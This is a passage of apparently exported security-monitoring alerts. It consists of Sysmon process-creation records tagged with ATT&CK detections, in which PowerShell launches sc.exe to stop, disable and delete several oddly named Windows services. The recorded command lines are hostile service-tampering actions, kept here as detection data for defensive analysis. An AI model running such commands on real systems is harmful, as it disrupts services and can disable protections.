""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.117004600Z"",""eventRecordID"":""2063"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.114\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010813e1900}\r\nProcessId: 1700\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.114"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010813e1900}"",""processId"":""1700"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Natimmonal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.322",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.104 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010b13d1900} +ProcessId: 6932 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Natimmonal Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Natimmonal Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.106165200Z"",""eventRecordID"":""2062"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.104\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010b13d1900}\r\nProcessId: 6932\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Natimmonal Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.104"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010b13d1900}"",""processId"":""6932"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Natimmonal Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.275",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.084 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010233c1900} +ProcessId: 4468 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaaal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.085893500Z"",""eventRecordID"":""2060"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.084\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010233c1900}\r\nProcessId: 4468\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.084"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010233c1900}"",""processId"":""4468"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaaal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.228",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.052 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010c9391900} +ProcessId: 4052 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop National +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop National",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.055029200Z"",""eventRecordID"":""2057"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.052\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010c9391900}\r\nProcessId: 4052\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop National\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.052"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010c9391900}"",""processId"":""4052"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop National"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.196",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.030 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-001036381900} +ProcessId: 4628 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Sougoudl +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.031802000Z"",""eventRecordID"":""2055"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.030\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-001036381900}\r\nProcessId: 4628\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.030"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-001036381900}"",""processId"":""4628"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.180",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.016 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-00106d371900} +ProcessId: 5448 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Sougoudl +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.018094100Z"",""eventRecordID"":""2054"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.016\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-00106d371900}\r\nProcessId: 5448\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.016"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-00106d371900}"",""processId"":""5448"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.134",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.981 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-001014351900} +ProcessId: 2596 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WmdnPnSN +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.984480500Z"",""eventRecordID"":""2051"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.981\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-001014351900}\r\nProcessId: 2596\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop 